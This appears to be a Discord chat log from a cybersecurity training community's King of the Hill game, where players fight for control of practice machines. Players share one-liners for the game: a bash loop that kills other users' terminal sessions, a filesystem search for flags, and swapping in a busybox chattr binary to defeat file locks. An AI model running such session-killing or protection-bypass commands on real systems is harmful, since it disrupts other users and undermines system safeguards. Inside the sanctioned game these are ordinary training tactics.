Thats definitely gotta be useful

steep agate
#

I will still post on my youtube channel in the future, now it's too busy for me

steep agate
limber rune
#

Cause the second I got into panda, I got kicked off by jcoscia

steep agate
#

did you log in with ssh? he could use a ps aux | grep pts, or w, and see your pts, and kick you out of the machine, so it saves time changing the password

limber rune
#

I did login w ssh

#

I tried changing the password but I got kicked off immediately

steep agate
limber rune
#

@molten mason what level are you actually?

#

Or maybe their just good at the game

#

Lmaoooooo

steep agate
#

probably he had some automated script in bash, or even oneline, to get you off the machine, this is relatively easy to do, for example: while true; do pkill -t -9 pts/#; done

molten mason
#

I'm not scripting anything, I just watch closely for shells and check logs

#

and I'm 0x2 but just enjoy koth

limber rune
#

Dang ok ok

limber rune
steep agate
steep agate
limber rune
#

Ooooohh

steep agate
#

find / -name flag* 2>/dev/null

#

etc

#

there are a lot of cool things to do in a machine instead of kicking others

limber rune
steep agate
limber rune
#

Fr *

steep agate
#

:)

#

Anyway, I'm going out here, I'm going to finish doing things here at home, see you later!

limber rune
#

Bye!

steep agate
#

Bye!

idle void
#

@molten masonDo you ever sleep?

molten mason
#

Sleep is just caffeine deficiency.

nova tide
#

sleep for weak

idle void
#

Anyone in the Hogwarts koth unable to connect to the ip?

#

nvm

molten mason
prisma roost
nova tide
#

they can't reset the box if you reset it first

stiff egret
idle void
#

@molten masonHow long have you been doing cyber security?

molten mason
idle void
stiff egret
#

Long time, totally rusty, let's goooo

#

ah shit, Hogwarts again, I hate this machine.

prisma roost
stiff egret
#

next level patching going on..

idle void
#

jcoscia is very good. Props to them

stiff egret
#

now I remember why I hated Hogwarts

stiff egret
prisma roost
#

almost all ports moved up 😄

fair adder
stiff egret
#

shut up naughty

prisma roost
#

ironic when the writer fails to break it

stiff egret
#

dude you have no idea how proud I am of that poem, that's original content yk

#

can't believe just lost in the box I created, I need to get back in the game

placid fable
stiff egret
placid fable
#

I had parrot and nyancat prepared for you guys 😅

prisma roost
stiff egret
#

It was fun,I haven't given up yet, but really fun playing after a long time

placid fable
#

There is this line from netstat -plant
tcp 0 1 10.10.76.19:54054 34.253.229.19:80 SYN_SENT 17670/http
How is there 34.253...?

stiff egret
#

Interesting

prisma roost
#

believe that's an aws thing

#

machines are hosted on aws i.e.,

placid fable
#

Anyways

stiff egret
#

Whoever patched it, kudos, everyone this is how you play king of the hill.

brazen cloud
#

Hehehe that is awesome

steep agate
stiff egret
#

Not the methods, I mean by the book someone would argue to actually fix the php code, but it was just cooler xD

idle void
#

when they reset the box twice after patching twice

#

sadge

prisma roost
rugged leaf
#

@molten mason Brother, you gave me and my frens here some troubles but you played well.... Respect man

rugged leaf
stiff egret
#

why you attack me like that?

mighty spoke
#

What can I do if someone uses chattr on king.txt & remove chattr?

nova tide
#

you can upload your own chattr binary. You can find it from busybox

mighty spoke
#

I did that , but it says something is not matching

nova tide
#

You need to upload a static binary not the one from your machine.

mighty spoke
#

Oww.. how can I do that?

nova tide
#

google busybox binaries.

mighty spoke
#

Ok

stiff egret
#

Check pins

molten mason
#

Is it allowed to run a honeypot, and run the real service (Ex. sshd) on another port? Asking for a friend.

stiff egret
#

As long as the real ssh is on, I don't see any problem.

molten mason
#

Okay, thanks! >:)

steep agate
#

out of date

paper widget
#

Hi, I just wonder when do I get access to koth or more how do I get access. Cause I get the notification that says only intermediate or experience members. When do I become that?

molten mason
paper widget
#

oooh so I can change that myself

#

Thanks

placid imp
#

are we allowed to change ssh ports?

placid fable
placid imp
#

thank you

steep agate
placid fable
wind fjord
#

If you go into the discord search and search “from:Naughty in:koth new”, you’ll see what happens every time this question is asked kekw

formal sable
#

Can anyone offer me a tip on the shrek room's shrek is like an onion flag? It looks like base64 but once decoded I don't recognise it as anything. There seems to be a mixture of hex characters and other stuff. I've played around with it quite a bit but not cracked it. I'd love a hint please.

fair adder
#

Have you ever seen shrek?

molten mason
fair adder
#

^

#

That's what I was going to say.

formal sable
# fair adder That was to you.

Thanks, yes a while back, but not so I remember any clues from the dialogue. I was expecting to need to apply multiple decodes to it, but I'm failing to see what the next one might be. Is there something more specific about the reference to layers?

sour vectorBOT
#

Gave +1 Rep to @tardy sand

fair adder
bright geyser